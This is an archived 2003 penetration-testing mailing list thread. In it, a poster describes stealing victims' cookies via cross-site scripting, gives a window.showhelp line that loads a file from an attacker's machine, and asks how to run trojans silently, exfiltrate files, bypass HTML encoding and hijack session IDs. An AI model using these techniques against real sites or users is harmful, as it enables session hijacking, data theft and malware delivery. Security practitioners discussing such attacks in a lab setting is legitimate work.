For Indian Tiger - Pen test lab

From: Sam (sangthomas@rediffmail.com)
Date: Fri Apr 25 2003 - 03:26:32 EDT


Hello,

I've been following your posts right from the penetration lab set up
phase. Would it be possible for you to share your experience so that
others can shorten their learning curve? Again, if not too much of a
trouble, can I contact you over your mail id (mail sent to your id
stated here bounces back ;))- as I'm in the starting throes of setting
up a penetration lab, and your recent experience and guidance would be
valuable for me.

Thanks,
Sam

-----Original Message-----
From: Indian Tiger [mailto:indiantiger@mailandnews.com]
Sent: 23 April, 2003 12:51 PM
To: pen test
Subject: RE: Proof of Concept Tool on Web Application Security

Hey Everybody,

First of all thank you very much to Robert, Rogan, Steve, Nicolas and
Leah
for
their guidance to test XSS and Session ID brute force attack.

Now I can transfer victim’s cookie to another location successfully. I
have
tested XSS to transfer cookie using following three ways:
1. Using document.location
2. Using Image src
3. Using hidden fields

The cookie, which I am getting, is of current application only mean If I
am
accessing
www.hotmail.com I will be getting only Hotmail's session ID asigned to
me
for that session.

Now how can I steal all cookies stored on the victim’s machine? or how
to
transfer a file
from Victim machine using Client Side Scripting or any other way?

Some sites converts < and > tags into &lt; and &gt; to protect them
selves
from XSS attacks. Is there any way to bypass this protection?

I was testing some trojan execution using XSS. In this process I was
able to
run help file 31users.chm from attackers machine to victims machine as
follows:
window.showhelp(file:///XXX. XXX. XXX. XXX/c:/windows/help/31users.chm)
Is it possible to run some trojan or activex componenet instead of help
file?
Without alerting for any pop-up.
Is this possible to write some malicious help file? (These files not
even
ask
before execution.)

As per IDefence’s Article on “Brute forcing Session ID” some time
session ID
is random. I have tested this against six sites and I was not much
lucky to
get session IDs in which only last 3-4 digits are changing.
What do you think in practice still are they so? Since iDEFENSE has
published
this research in Nov 2001 and current scenario might be a bit changed.

In my research of six sites, four sites were using ASP session variable
to
generated session ID and remaining two their own.

I was able to hijack ASP sessions using session IDs. In my testing,
first I
have logged in as user1, got his session ID and using user1’s session
ID, I
was able to hijack user1.

Any help on this would be highly appreciated.

Thanking You.
Sincerely,

Indian Tiger, CISSP

------------------------------------------------------------------------

---
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam,
the 
world's premier event for IT and network security experts.  The two-day 
Training features 6 hand-on courses on May 12-13 taught by
professionals.  
The two-day Briefings on May 14-15 features 24 top speakers with no
vendor 
sales pitches.  Deadline for the best rates is April 25.  Register today
to 
ensure your place.  http://www.securityfocus.com/BlackHat-pen-test 
------------------------------------------------------------------------
----
---------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the 
world's premier event for IT and network security experts.  The two-day 
Training features 6 hand-on courses on May 12-13 taught by professionals.  
The two-day Briefings on May 14-15 features 24 top speakers with no vendor 
sales pitches.  Deadline for the best rates is April 25.  Register today to 
ensure your place.  http://www.securityfocus.com/BlackHat-pen-test 
----------------------------------------------------------------------------


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:32 EDT